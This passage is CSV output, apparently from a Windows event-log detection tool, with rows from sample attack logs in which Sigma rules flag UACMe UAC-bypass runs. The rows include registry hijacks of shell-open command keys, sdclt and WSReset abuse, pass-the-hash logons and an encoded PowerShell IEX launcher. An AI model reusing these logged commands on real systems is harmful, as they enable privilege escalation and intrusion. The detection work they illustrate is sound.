",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,high,UAC Bypass Using .NET Code Profiler on MMC,,rules/sigma/file_event/sysmon_uac_bypass_dotnet_profiler.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.730 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc : Path: 
C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 39",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.796 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 376 0000028064463A00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:07.144 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 39",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 41 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:30.389 
+09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:31.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 342 00000280644BB040 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 43 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:34.302 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 342 0000028064468040 : Path: C:\Windows\System32\consent.exe : 
User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:34.689 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 330 000002806444C490 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 45 c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys 
Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:16.967 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 294 0000028064421EA0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\ChangePk.exe"" : Path: C:\Windows\System32\changepk.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\slui.exe"" 0x03",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using ChangePK and SLUI,,rules/sigma/process_creation/win_uac_bypass_changepk_slui.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:20.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 444 00000280644250C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:20.937 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\SystemSettingsAdminFlows.exe"" EnterProductKey : Path: C:\Windows\System32\SystemSettingsAdminFlows.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\ImmersiveControlPanel\SystemSettings.exe"" 
-ServerName:microsoft.windows.immersivecontrolpanel",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:22.193 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 53 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:28.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:28.925 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:29.409 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 53",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:29.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 300 000002806445E5C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 53",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,medium,High Integrity Sdclt Process,,rules/sigma/process_creation/sysmon_high_integrity_sdclt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter : Path: C:\Windows\System32\control.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\sdclt.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.972 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:35.402 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.087 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\windows\system32\cmd.exe ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 55 
c:\Windows\SysWOW64\notepad.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.713 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\msconfig.exe"" -5 : Path: C:\Windows\System32\msconfig.exe : User: MSEDGEWIN10\IEUser : Parent Command: c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.774 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 322 000002806447A490 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:59.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\msconfig.exe"" -5 : Path: C:\Windows\System32\msconfig.exe : User: MSEDGEWIN10\IEUser : Parent Command: c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 56 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool 
UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:31.175 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:31.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:31.949 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WSReset.exe"" : Path: C:\Windows\System32\WSReset.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 56",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:32.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 312 000002806444CB40 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,informational,Process 
Creation,"Command: ""C:\Windows\system32\WSReset.exe"" : Path: C:\Windows\System32\WSReset.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 56",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,high,UAC Bypass WSReset,,rules/sigma/process_creation/win_uac_bypass_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\WSReset.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,Wsreset UAC Bypass,,rules/sigma/process_creation/win_wsreset_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,Bypass UAC via WSReset.exe,,rules/sigma/process_creation/win_uac_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.455 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:55.299 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d 
""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:55.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d ""{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,informational,Logon Type 9 - NewCredentials,User: IEUser : Workstation: - : IP Address: ::1 : Port: 0 : LogonID: 0x38f87e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx +2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx +2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx +2019-08-14 20:53:29.688 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\explorer.exe"" shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))"""""" : Path: C:\Windows\System32\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: 
""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))"""""" : Path: C:\Windows\System32\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall 